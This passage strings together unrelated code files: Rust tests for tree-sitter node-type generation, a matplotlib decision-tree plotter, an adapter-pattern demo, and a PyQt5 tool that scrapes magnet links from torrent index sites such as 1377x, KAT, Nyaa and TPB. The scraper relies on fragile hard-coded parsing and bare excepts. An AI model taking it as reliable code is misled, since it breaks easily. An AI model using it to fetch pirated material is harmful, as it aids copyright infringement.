kind: "x".to_string(),
named: true,
},
]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_node_types_for_aliased_nodes() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "thing".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![Rule::named("type"), Rule::named("expression")]),
},
Variable {
name: "type".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::alias(
Rule::named("identifier"),
"type_identifier".to_string(),
true,
),
Rule::string("void"),
]),
},
Variable {
name: "expression".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::named("identifier"),
Rule::alias(
Rule::named("foo_identifier"),
"identifier".to_string(),
true,
),
]),
},
Variable {
name: "identifier".to_string(),
kind: VariableType::Named,
rule: Rule::pattern("\\w+"),
},
Variable {
name: "foo_identifier".to_string(),
kind: VariableType::Named,
rule: Rule::pattern("[\\w-]+"),
},
],
});
assert_eq!(node_types.iter().find(|t| t.kind == "foo_identifier"), None);
assert_eq!(
node_types.iter().find(|t| t.kind == "identifier"),
Some(&NodeInfoJSON {
kind: "identifier".to_string(),
named: true,
subtypes: None,
children: None,
fields: None,
})
);
assert_eq!(
node_types.iter().find(|t| t.kind == "type_identifier"),
Some(&NodeInfoJSON {
kind: "type_identifier".to_string(),
named: true,
subtypes: None,
children: None,
fields: None,
})
);
}
#[test]
fn test_node_types_with_multiple_valued_fields() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::choice(vec![
Rule::Blank,
Rule::repeat(Rule::field("f1".to_string(), Rule::named("b"))),
]),
Rule::repeat(Rule::named("c")),
]),
},
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::string("b"),
},
Variable {
name: "c".to_string(),
kind: VariableType::Named,
rule: Rule::string("c"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "a".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![NodeTypeJSON {
kind: "c".to_string(),
named: true,
},]
}),
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: true,
required: false,
types: vec![NodeTypeJSON {
kind: "b".to_string(),
named: true,
}]
}
)]
.into_iter()
.collect()
),
}
);
}
#[test]
fn test_node_types_with_fields_on_hidden_tokens() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![Variable {
name: "script".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("a".to_string(), Rule::pattern("hi")),
Rule::field("b".to_string(), Rule::pattern("bye")),
]),
}],
});
assert_eq!(
node_types,
[NodeInfoJSON {
kind: "script".to_string(),
named: true,
fields: Some(BTreeMap::new()),
children: None,
subtypes: None
}]
);
}
#[test]
fn test_node_types_with_multiple_rules_same_alias_name() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "script".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::named("a"),
// Rule `b` is aliased as rule `a`
Rule::alias(Rule::named("b"), "a".to_string(), true),
]),
},
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f1".to_string(), Rule::string("1")),
Rule::field("f2".to_string(), Rule::string("2")),
]),
},
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f2".to_string(), Rule::string("22")),
Rule::field("f2".to_string(), Rule::string("222")),
Rule::field("f3".to_string(), Rule::string("3")),
]),
},
],
});
assert_eq!(
&node_types
.iter()
.map(|t| t.kind.as_str())
.collect::<Vec<_>>(),
&["a", "script", "1", "2", "22", "222", "3"]
);
assert_eq!(
&node_types[0..2],
&[
// A combination of the types for `a` and `b`.
NodeInfoJSON {
kind: "a".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![
(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "1".to_string(),
named: false,
}]
}
),
(
"f2".to_string(),
FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "2".to_string(),
named: false,
},
NodeTypeJSON {
kind: "22".to_string(),
named: false,
},
NodeTypeJSON {
kind: "222".to_string(),
named: false,
}
]
},
),
(
"f3".to_string(),
FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "3".to_string(),
named: false,
}]
}
),
]
.into_iter()
.collect()
),
},
NodeInfoJSON {
kind: "script".to_string(),
named: true,
subtypes: None,
// Only one node
children: Some(FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "a".to_string(),
named: true,
}]
}),
fields: Some(BTreeMap::new()),
}
]
);
}
#[test]
fn test_node_types_with_tokens_aliased_to_match_rules() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("b"), Rule::named("c")]),
},
// Ordinarily, `b` nodes have two named `c` children.
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("c"), Rule::string("B"), Rule::named("c")]),
},
Variable {
name: "c".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::string("C"),
// This token is aliased as a `b`, which will produce a `b` node
// with no children.
Rule::alias(Rule::string("D"), "b".to_string(), true),
]),
},
],
});
assert_eq!(
node_types.iter().map(|n| &n.kind).collect::<Vec<_>>(),
&["a", "b", "c", "B", "C"]
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "b".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: false,
types: vec![NodeTypeJSON {
kind: "c".to_string(),
named: true,
}]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_get_variable_info() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
// Required field `field1` has only one node type.
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1"),
],
}],
},
// Hidden node
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(1))],
}],
},
// Optional field `field2` can have two possible node types.
SyntaxVariable {
name: "rule2".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(0))],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::terminal(2))
.with_field_name("field2"),
],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::terminal(3))
.with_field_name("field2"),
],
},
],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
assert_eq!(
variable_info[2].fields,
vec![(
"field2".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: false,
},
types: vec![
ChildType::Normal(Symbol::terminal(2)),
ChildType::Normal(Symbol::terminal(3)),
],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
#[test]
fn test_get_variable_info_with_repetitions_inside_fields() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
// Field associated with a repetition.
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1")],
},
Production {
dynamic_precedence: 0,
steps: vec![],
},
],
},
// Repetition node
SyntaxVariable {
name: "_rule0_repeat".to_string(),
kind: VariableType::Hidden,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(1))],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::non_terminal(1)),
ProductionStep::new(Symbol::non_terminal(1)),
],
},
],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: true,
},
types: vec![ChildType::Normal(Symbol::terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
#[test]
fn test_get_variable_info_with_inherited_fields() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1)),
ProductionStep::new(Symbol::terminal(1)),
],
},
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::non_terminal(1))],
},
],
},
// Hidden node with fields
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(2)).with_alias(".", false),
ProductionStep::new(Symbol::terminal(3)).with_field_name("field1"),
],
}],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::terminal(3))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
assert_eq!(
variable_info[0].children_without_fields,
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: true,
},
types: vec![
ChildType::Normal(Symbol::terminal(0)),
ChildType::Normal(Symbol::terminal(1)),
],
}
);
}
#[test]
fn test_get_variable_info_with_supertypes() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1"),
ProductionStep::new(Symbol::terminal(1)),
],
}],
},
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(2))],
},
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(3))],
},
],
},
],
// _rule1 is a supertype
vec![Symbol::non_terminal(1)],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::non_terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
fn get_node_types(grammar: InputGrammar) -> Vec<NodeInfoJSON> {
let (syntax_grammar, lexical_grammar, _, simple_aliases) =
prepare_grammar(&grammar).unwrap();
let variable_info =
get_variable_info(&syntax_grammar, &lexical_grammar, &simple_aliases).unwrap();
generate_node_types_json(
&syntax_grammar,
&lexical_grammar,
&simple_aliases,
&variable_info,
)
}
fn build_syntax_grammar(
variables: Vec<SyntaxVariable>,
supertype_symbols: Vec<Symbol>,
) -> SyntaxGrammar {
let mut syntax_grammar = SyntaxGrammar::default();
syntax_grammar.variables = variables;
syntax_grammar.supertype_symbols = supertype_symbols;
syntax_grammar
}
fn build_lexical_grammar() -> LexicalGrammar {
let mut lexical_grammar = LexicalGrammar::default();
for i in 0..10 {
lexical_grammar.variables.push(LexicalVariable {
name: format!("token_{}", i),
kind: VariableType::Named,
implicit_precedence: 0,
start_state: 0,
});
}
lexical_grammar
}
}
plot_tree.py | import matplotlib.pyplot as plt
import seaborn as sns
class PlotTree():
def __init__(self,tree_class):
self._tree_class=tree_class
self._decision_node = dict(boxstyle="sawtooth", fc="0.8")
self._leaf_node = dict(boxstyle="round4", fc="0.8")
self._arrow_args = dict(arrowstyle="<-")
    def __get_tree_depth(self, tree):
        """Return the depth of the tree."""
        depth = 0
        # The first key of the dict stores the node's own text, so it is not counted
        for key in ('Left', 'Right'):
            # Record the depth of each child node
            sub_tree = tree[key]
            if type(sub_tree).__name__ == "dict":
                # If this node branches, compute its depth recursively
                thisdepth = self.__get_tree_depth(sub_tree)
            else:
                # Otherwise the depth is one
                thisdepth = 1
            # Compare the branch depths and keep the deepest
            if thisdepth > depth:
                depth = thisdepth
        # The current node's depth is the deepest branch plus one
        return depth + 1
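    # A worked example (hypothetical tree layout this class assumes, where the
    # first key holds the node's display text):
    #   {'node': 'x <= 1', 'Left': 'A',
    #    'Right': {'node': 'y <= 2', 'Left': 'B', 'Right': 'C'}}
    # The left branch is a leaf (depth 1), the right branch is a subtree of
    # depth 2, so the whole tree has depth max(1, 2) + 1 = 3.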
def __plot_node(self,node_txt, cntr_pt, prnt_pt, node_type):
self._ax1.annotate(node_txt, xy=prnt_pt, xycoords='axes fraction',
xytext=cntr_pt, textcoords='axes fraction',
va="center", ha="center", bbox=node_type, arrowprops=self._arrow_args)
def __plot_mid_text(self,cntr_pt, prnt_pt, txt_string):
xMid = (prnt_pt[0] - cntr_pt[0]) / 2.0 + cntr_pt[0]
yMid = (prnt_pt[1] - cntr_pt[1]) / 2.0 + cntr_pt[1]
self._ax1.text(xMid, yMid, txt_string, va="center",
ha="center", rotation=30)
def __plot_tree(self,tree, prnt_pt, node_txt, branch=None):
self._layer += 1
diff = 1 / 2**(self._layer)
keys = list(tree.keys())
text = tree[keys[0]]
if branch == 'Left':
self._xOff -= diff
elif branch == 'Right':
self._xOff += diff
else:
pass
cntr_pt = (self._xOff, self._yOff)
self.__plot_mid_text(cntr_pt, prnt_pt, node_txt)
self.__plot_node(text, cntr_pt, prnt_pt, self._decision_node)
self._yOff = self._yOff - 1.0 / self._totalD
for key in keys[1:]:
sub_tree = tree[key]
if type(sub_tree).__name__ == 'dict':
self.__plot_tree(sub_tree, cntr_pt, str(key), key)
            else:
                if key == 'Left':
x = self._xOff - diff / 2
elif key == 'Right':
x = self._xOff + diff / 2
else:
pass
self.__plot_node(sub_tree, (x, self._yOff), cntr_pt, self._leaf_node)
self.__plot_mid_text((x, self._yOff), cntr_pt, str(key))
if branch == 'Left':
self._xOff += diff
elif branch == 'Right':
self._xOff -= diff
else:
pass
self._layer -= 1
self._yOff = self._yOff + 1.0 / self._totalD
def tree_structure_plot(self):
fig = plt.figure(1, facecolor='white')
fig.clf()
axprops = dict(xticks=[], yticks=[])
self._ax1 = plt.subplot(111, frameon=False, **axprops)
self._totalD = float(self.__get_tree_depth(self._tree_class.tree))
self._xOff = 0.5
self._yOff = 1.0
self._layer = 0
self.__plot_tree(self._tree_class.tree, (0.5, 1.0), '')
plt.show()
def confusion_matrix_plot(self):
mat=self._tree_class.confusion_matrix
if mat is None:
print("The confusion matrix is not computed. Please use 'test()' in 'DecisionTree' class to get it.")
else:
fig, ax = plt.subplots(figsize=(6, 6))
sns.heatmap(mat,xticklabels=mat.columns,yticklabels=mat.index,
cbar_kws={"shrink": .5}, ax=ax)
plt.tight_layout()
            plt.show()
object_adapter.py | # This is the object-based adapter pattern
# It allows us to take an outside class 'StrangeCreature' with a different interface,
# and squeeze that SOB into another hierarchy.
# The good thing about the object version of this pattern is that if StrangeCreature had
# a lot of subtypes, we would not need to write an adapter for each subtype.
# (I don't think this is relevant given Python's dynamic typing, but it's good to know for something like C++, I'm guessing)
import abc
class StrangeCreature(object):
def make_horrible_noise(self):
print("Rawr")
class Animal(object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def make_noise(self):
raise NotImplementedError
class Horse(Animal):
def make_noise(self):
print("Vrinsk")
class Platypus(Animal):
_strange_creature = None
def __init__(self):
self._strange_creature = StrangeCreature()
def make_noise(self):
return self._strange_creature.make_horrible_noise()
p = Platypus()
p.make_noise()
h = Horse()
h.make_noise()
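# Expected output when run as a script:
#   Rawr
#   Vrinsk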
search.py | import math
import re
import pyperclip
import requests
from bs4 import BeautifulSoup
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import src.mglobals
path = src.mglobals.base_path
class Ui_searchMainWindow(object):
def copied_success_message(self):
successMessageBox = QMessageBox()
successMessageBox.setIcon(QMessageBox.Information)
successMessageBox.setText(
"Magnet links have been successfully copied to the clipboard.")
successMessageBox.setWindowTitle("Task Completed!")
successMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
successMessageBox.setWindowIcon(icon)
successMessageBox.exec_()
def copy(self):
choice_row = self.tableTableWidget.currentRow()
choice_magnet = self.magnets[choice_row]
pyperclip.copy(choice_magnet)
self.copied_success_message()
def callback(self):
query = self.queryLineEdit.text()
limit = self.limitSlider.value()
        def resize():
self.tableTableWidget.resizeColumnToContents(0)
self.tableTableWidget.resizeColumnToContents(1)
self.tableTableWidget.resizeColumnToContents(2)
self.tableTableWidget.resizeColumnToContents(3)
self.tableTableWidget.resizeColumnToContents(4)
def searched_success_message():
successMessageBox = QMessageBox()
successMessageBox.setIcon(QMessageBox.Information)
successMessageBox.setText(
"Magnet links have been successfully scraped.")
successMessageBox.setWindowTitle("Task Completed!")
successMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
successMessageBox.setWindowIcon(icon)
successMessageBox.exec_()
def error_message():
errorMessageBox = QMessageBox()
errorMessageBox.setIcon(QMessageBox.Information)
errorMessageBox.setText(
"Something went wrong! Please inform me through GitHub!")
errorMessageBox.setWindowTitle("Error!")
errorMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
errorMessageBox.setWindowIcon(icon)
errorMessageBox.exec_()
def x1377():
try:
main_link = "https://1377x.to/search/" + query + '/1/'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
limit_counter = 0
page_links_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^/torrent/")})
for page_link in page_links_soup:
if limit_counter < limit:
page_link = "https://1377x.to" + page_link.get('href')
page_request = requests.get(
page_link, headers={'User-Agent': 'Mozilla/5.0'})
page_source = page_request.content
page_soup = BeautifulSoup(page_source, 'lxml')
title = (page_soup.find('h1').text).replace("\n", " ")
seeder = page_soup.find('span', class_="seeds").text
leecher = page_soup.find('span', class_="leeches").text
size = page_soup.findAll('span')[15].text
date = page_soup.findAll('span')[19].text
magnet = page_soup.find(
'a', attrs={'href': re.compile("^magnet:?")}).get('href')
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(title))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeder))
self.tableTableWidget.setItem(row_position, 1, item)
                        item = QTableWidgetItem()
                        item.setData(Qt.DisplayRole, int(leecher))
                        self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(size))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(date))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("1377x"))
self.magnets.append(magnet)
limit_counter = limit_counter + 1
            except Exception:
error_message()
def kat():
try:
main_link = "https://kat.rip/usearch/" + query
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('a', class_="cellMainLink")
seeders_soup = main_soup.findAll('td', class_="green center")
leechers_soup = main_soup.findAll(
'td', class_="red lasttd center")
sizes_soup = main_soup.findAll('td', class_="nobr center")
dates_soup = main_soup.findAll(
'td', class_="center", title=True)
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet:?"), 'title': "Torrent magnet link"})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
titles.append(title.text)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit:
sizes.append(size.text)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit:
dates.append(date.text)
limit_counter = limit_counter + 1
limit_counter = 0
count1 = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
limit_counter = limit_counter + 1
count1 = count1 + 1
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("KAT"))
count2 = count2 + 1
            except Exception:
error_message()
def nyaa():
try:
main_link = 'https://nyaa.si/?q=' + query
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('a', title=True, class_=False, attrs={
'href': re.compile("^/view/")})
seeders_soup = main_soup.findAll('td', class_="text-center")
leechers_soup = main_soup.findAll('td', class_="text-center")
sizes_soup = main_soup.findAll('td', class_="text-center")
dates_soup = main_soup.findAll('td', class_="text-center")
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet:?")})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
titles.append(title.text)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit*6:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit*6:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit*6:
sizes.append(size.text)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit*6:
dates.append(date.text)
limit_counter = limit_counter + 1
limit_counter = 0
count1 = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
limit_counter = limit_counter + 1
count1 = count1 + 1
seeder1 = seeders[3]
seeders.pop(0)
seeders.pop(1)
seeders.pop(2)
seeders.pop(3)
seeders = seeders[6-1::6]
seeders.insert(0, seeder1)
leecher1 = leechers[4]
leechers.pop(0)
leechers.pop(1)
leechers.pop(2)
leechers.pop(3)
leechers.pop(4)
leechers = leechers[6-1::6]
leechers.insert(0, leecher1)
size1 = sizes[1]
sizes.pop(0)
sizes.pop(1)
sizes = sizes[6-1::6]
sizes.insert(0, size1)
date1 = dates[2]
dates.pop(0)
dates.pop(1)
dates.pop(2)
dates = dates[6-1::6]
dates.insert(0, date1)
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("Nyaa"))
count2 = count2 + 1
            except Exception:
error_message()
def rarbg():
try:
token_url = "https://torrentapi.org/pubapi_v2.php?get_token=get_token&app_id=MagnetMagnet"
token_request = requests.get(token_url, headers={'User-Agent': 'Mozilla/5.0'})
token = token_request.json()["token"]
main_link = 'https://torrentapi.org/pubapi_v2.php?mode=search&search_string=' + \
query + '&token=' + token + '&format=json_extended&app_id=MagnetMagnet'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.json()["torrent_results"]
limit_counter = 0
titles = []
seeders = []
leechers = []
sizes = []
dates = []
for item in main_source:
if limit_counter < limit:
def convert_size(size):
if size == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB",
"TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size, 1024)))
p = math.pow(1024, i)
s = round(size / p, 2)
size = "%s %s" % (s, size_name[i])
return size
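                        # e.g. convert_size(1536) == "1.5 KB"; the API's `size`
                        # field is taken here to be a byte count (an assumption).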
titles.append(item["title"])
seeders.append(item["seeders"])
leechers.append(item["leechers"])
sizes.append(convert_size(item["size"]))
dates.append(item["pubdate"])
self.magnets.append(item["download"])
limit_counter += 1
else:
pass
print(titles)
count2 = 0
while count2 < limit_counter:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("RARBG"))
count2 = count2 + 1
            except Exception:
error_message()
def tpb():
try:
main_link = 'https://tpb.party/search/' + query + '/1/99/0/'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('div', class_="detName")
seeders_soup = main_soup.findAll(
'td', attrs={'align': "right"})
seeders_soup = seeders_soup[0::2]
leechers_soup = main_soup.findAll(
'td', attrs={'align': "right"})
leechers_soup = leechers_soup[1::2]
sizes_soup = main_soup.findAll('font', class_="detDesc")
dates_soup = main_soup.findAll('font', class_="detDesc")
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet")})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
title = title.text.replace("\n", "")
titles.append(title)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit:
size = size.text.split(", ")
size = size[1].replace("Size ", "")
sizes.append(size)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit:
date = date.text.split(", ")
date = date[0].replace("Uploaded ", "")
dates.append(date)
limit_counter = limit_counter + 1
count1 = 0
limit_counter = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
count1 = count1 + 1
limit_counter = limit_counter + 1
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("TPB"))
count2 = count2 + 1
            except Exception:
error_message()
